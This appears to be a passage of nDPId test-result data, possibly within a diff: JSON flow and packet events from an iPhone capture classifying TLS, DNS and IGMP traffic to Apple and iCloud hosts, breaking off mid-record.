00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":225,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598888,"flow_last_seen":1582454598974,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598974,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cl4.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00983{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598721,"flow_last_seen":1582454599041,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599041,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
03624{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":237,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1582454598721,"flow_last_seen":1582454599054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6277,"flow_avg_l4_payload_len":697,"midstream":0,"thread_ts_msec":1582454599054,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","server_names":"p62-keyvalueservice.icloud.com,p41-keyvalueservice.icloud.com,p97-keyvalueservice.icloud.com,p28-keyvalueservice.icloud.com,p32-keyvalueservice.icloud.com,p56-keyvalueservice.icloud.com,p33-keyvalueservice.icloud.com,p37-keyvalueservice.icloud.com,p67-keyvalueservice.icloud.com,p70-keyvalueservice.icloud.com,p63-keyvalueservice.icloud.com,p07-keyvalueservice.icloud.com,p52-keyvalueservice.icloud.com,p18-keyvalueservice.icloud.com,p21-keyvalueservice.icloud.com,p17-keyvalueservice.icloud.com,p36-keyvalueservice.icloud.com,p19-keyvalueservice.icloud.com,p26-keyvalueservice.icloud.com,p55-keyvalueservice.icloud.com,p06-keyvalueservice.icloud.com,p23-keyvalueservice.icloud.com,p65-keyvalueservice.icloud.com,p58-keyvalueservice.icloud.com,p35-keyvalueservice.icloud.com,p42-keyvalueservice.icloud.com,p12-keyvalueservice.icloud.com,p15-keyvalueservice.icloud.com,p16-keyvalueservice.icloud.com,p29-keyvalueservice.icloud.com,p39-keyvalueservice.icloud.com,p71-keyvalueservice.icloud.com,p22-keyvalueservice.icloud.com,p40-keyvalueservice.icloud.com,p11-keyvalueservice.icloud.com,p66-keyvalueservice.icloud.com,p68-keyvalueservice.icloud.com,p201-keyvalueservice.icloud.com,p10-keyvalueservice.icloud.com,p61-keyvalueservice.icloud.com,p30-keyvalueservice.icloud.com,p01-keyvalueservice.icloud.com,p14-keyvalueservice.icloud.com,p50-keyvalueservice.icloud.com,p31-keyvalueservice.icloud.com,p47-keyvalueservice.icloud.com,p48-keyvalueservice.icloud.com,p20-keyvalueservice.icloud.com,p51-keyvalueservice.icloud.com,p27-keyvalueservice.icloud.com,p49-keyvalueservice.icloud.com,p03-keyvalueservice.icloud.com,p24-keyvalueservice.icloud.com,p25-keyvalueservice.icloud.com,p08-keyvalueservice.icloud.com,p13-keyvalueservice.icloud.com,p04-keyvalueservice.icloud.com,p05-keyvalueservice.icloud.com,p02-keyvalueservice.icloud.com,p09-keyvalueservice.icloud.com,p57-keyvalueservice.icloud.com,p59-keyvalueservice.icloud.com,p64-keyvalueservice.icloud.com,p38-keyvalueservice.icloud.com,p54-keyvalueservice.icloud.com,p72-keyvalueservice.icloud.com,keyvalueservice.icloud.com,p69-keyvalueservice.icloud.com,p43-keyvalueservice.icloud.com,p45-keyvalueservice.icloud.com,p202-keyvalueservice.icloud.com,p98-keyvalueservice.icloud.com,p34-keyvalueservice.icloud.com,p44-keyvalueservice.icloud.com,p46-keyvalueservice.icloud.com,p53-keyvalueservice.icloud.com,p60-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=keyvalueservice.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D8:84:3B:15:06:49:1C:72:C4:05:C0:F0:82:3B:43:4A:D1:8F:D5:9F"}}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598888,"flow_last_seen":1582454598888,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598888,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1582454598888,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598888,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG0pfAqAIRaEk9HsWXAbvBeeAaAAAAALDC\/\/9qCgAAAgQFtAEDAwcBAQgKEd\/pSQAAAAAEAgAA"}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1582454598888,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598888,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGHz7AqAIRXHr8UsWWAbuHn+lThYjGHYAQBAuvrgAAAQEIChHf6Un\/dyjx"}
00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":202,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598766,"flow_last_seen":1582454598889,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598889,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"iphone-ld.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1582454598892,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598892,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGrLvAqAIREfi5V8WVAbuoGt7pnxPiJoAQBAsEtQAAAQEIChHf6VPpLCwF"}
00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":206,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598721,"flow_last_seen":1582454598893,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598893,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":212,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598766,"flow_last_seen":1582454598926,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598926,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"iphone-ld.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1582454598926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598926,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGHZxoST0ewKgCEQG7xZdpIXVbwXngG6BScSBpXgAAAgQFrAQCCAqgrSHdEd\/pSQEDAwc="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1582454598934,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598934,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG0qPAqAIRaEk9HsWXAbvBeeAbaSF1XIAQBAsFUQAAAQEIChHf6XCgrSHd"}
00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598888,"flow_last_seen":1582454598934,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598934,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cl4.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":225,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598888,"flow_last_seen":1582454598974,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598974,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cl4.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00983{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598721,"flow_last_seen":1582454599041,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599041,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
03624{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":237,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1582454598721,"flow_last_seen":1582454599054,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6277,"flow_avg_l4_payload_len":697,"midstream":0,"thread_ts_msec":1582454599054,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","server_names":"p62-keyvalueservice.icloud.com,p41-keyvalueservice.icloud.com,p97-keyvalueservice.icloud.com,p28-keyvalueservice.icloud.com,p32-keyvalueservice.icloud.com,p56-keyvalueservice.icloud.com,p33-keyvalueservice.icloud.com,p37-keyvalueservice.icloud.com,p67-keyvalueservice.icloud.com,p70-keyvalueservice.icloud.com,p63-keyvalueservice.icloud.com,p07-keyvalueservice.icloud.com,p52-keyvalueservice.icloud.com,p18-keyvalueservice.icloud.com,p21-keyvalueservice.icloud.com,p17-keyvalueservice.icloud.com,p36-keyvalueservice.icloud.com,p19-keyvalueservice.icloud.com,p26-keyvalueservice.icloud.com,p55-keyvalueservice.icloud.com,p06-keyvalueservice.icloud.com,p23-keyvalueservice.icloud.com,p65-keyvalueservice.icloud.com,p58-keyvalueservice.icloud.com,p35-keyvalueservice.icloud.com,p42-keyvalueservice.icloud.com,p12-keyvalueservice.icloud.com,p15-keyvalueservice.icloud.com,p16-keyvalueservice.icloud.com,p29-keyvalueservice.icloud.com,p39-keyvalueservice.icloud.com,p71-keyvalueservice.icloud.com,p22-keyvalueservice.icloud.com,p40-keyvalueservice.icloud.com,p11-keyvalueservice.icloud.com,p66-keyvalueservice.icloud.com,p68-keyvalueservice.icloud.com,p201-keyvalueservice.icloud.com,p10-keyvalueservice.icloud.com,p61-keyvalueservice.icloud.com,p30-keyvalueservice.icloud.com,p01-keyvalueservice.icloud.com,p14-keyvalueservice.icloud.com,p50-keyvalueservice.icloud.com,p31-keyvalueservice.icloud.com,p47-keyvalueservice.icloud.com,p48-keyvalueservice.icloud.com,p20-keyvalueservice.icloud.com,p51-keyvalueservice.icloud.com,p27-keyvalueservice.icloud.com,p49-keyvalueservice.icloud.com,p03-keyvalueservice.icloud.com,p24-keyvalueservice.icloud.com,p25-keyvalueservice.icloud.com,p08-keyvalueservice.icloud.com,p13-keyvalueservice.icloud.com,p04-keyvalueservice.icloud.com,p05-keyvalueservice.icloud.com,p02-keyvalueservice.icloud.com,p09-keyvalueservice.icloud.com,p57-keyvalueservice.icloud.com,p59-keyvalueservice.icloud.com,p64-keyvalueservice.icloud.com,p38-keyvalueservice.icloud.com,p54-keyvalueservice.icloud.com,p72-keyvalueservice.icloud.com,keyvalueservice.icloud.com,p69-keyvalueservice.icloud.com,p43-keyvalueservice.icloud.com,p45-keyvalueservice.icloud.com,p202-keyvalueservice.icloud.com,p98-keyvalueservice.icloud.com,p34-keyvalueservice.icloud.com,p44-keyvalueservice.icloud.com,p46-keyvalueservice.icloud.com,p53-keyvalueservice.icloud.com,p60-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=keyvalueservice.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D8:84:3B:15:06:49:1C:72:C4:05:C0:F0:82:3B:43:4A:D1:8F:D5:9F"}}
00541{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":238,"source":"iphone.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599054,"flow_last_seen":1582454599054,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1582454599054,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3}
00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"iphone.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1582454599054,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1582454599054,"pkt":"AQBeAAAWxGGLNYKpCABGAAAoAABAAAECQgDAqAIR4AAAFpQEAAAiAPkCAAAAAQQAAADgAAD7"}
00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":238,"source":"iphone.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599054,"flow_last_seen":1582454599054,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1582454599054,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
@@ -215,82 +215,82 @@
00775{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":260,"source":"iphone.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454599065,"flow_last_seen":1582454599105,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1582454599105,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62160,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsa.apple.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.137.166.35"}}
00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1582454599105,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":127,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":127,"pkt_l4_len":93,"thread_ts_msec":1582454599105,"pkt":"xGGLNYKpxiwDYGpkCABFAABx6W4AAEARC6vAqAIBwKgCEQA1yz8AXf6hdCWBgAABAAIAAAAAA2dzYQVhcHBsZQNjb20AAAEAAcAMAAUAAQAAEZYAGgNnc2EFYXBwbGUDY29tBmFrYWRucwNuZXQAwCsAAQABAAAA4QAEEYmmIw=="}
00775{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":261,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454599073,"flow_last_seen":1582454599105,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1582454599105,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52031,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsa.apple.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.137.166.35"}}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599225,"flow_last_seen":1582454599225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454599225,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1582454599225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454599225,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGtbvAqAIREfiwS8WYAbuypew6AAAAALDC\/\/9PDwAAAgQFtAEDAwcBAQgKEd\/qGwAAAAAEAgAA"}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1582454599259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454599259,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAC4GB8AR+LBLwKgCEQG7xZj0WnUXsqXsO6BScSAj8wAAAgQFrAEBCApbEwn1Ed\/qGwEDAwU="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1582454599261,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454599261,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGtcfAqAIREfiwS8WYAbuypew79Fp1GIAQBAu8hwAAAQEIChHf6p1bEwn1"}
00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":268,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599225,"flow_last_seen":1582454599261,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454599261,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00971{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":270,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599225,"flow_last_seen":1582454599295,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599295,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":272,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599225,"flow_last_seen":1582454599297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1582454599297,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": 